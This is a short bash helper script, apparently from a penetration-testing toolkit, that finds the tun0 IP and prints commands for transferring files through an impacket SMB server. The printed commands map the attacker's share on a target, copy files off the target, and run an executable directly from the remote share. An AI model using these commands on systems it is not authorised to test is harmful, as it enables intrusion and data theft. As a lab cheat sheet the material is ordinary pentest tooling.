#!/bin/bash

# fire up a smb server and display commands for connection

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

ip=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1) 2>/dev/null

echo -e "${Frame}###${End} ${Title}Transfer Through SMB Server${End} ${Frame}###${End}"
echo -e "${Point} impacket-smbserver share . -username evil -password evil -smb2support"
echo -e "    net use * \\\\\\$ip\share /u:evil evil"
echo -e "    copy Z:\\\kali_to_target.exe"
echo -e "    copy target_to_kali.txt Z:\\"
echo -e "    \\\\\\$ip\\\share\\\file.exe ${Comment}# run executable${End}"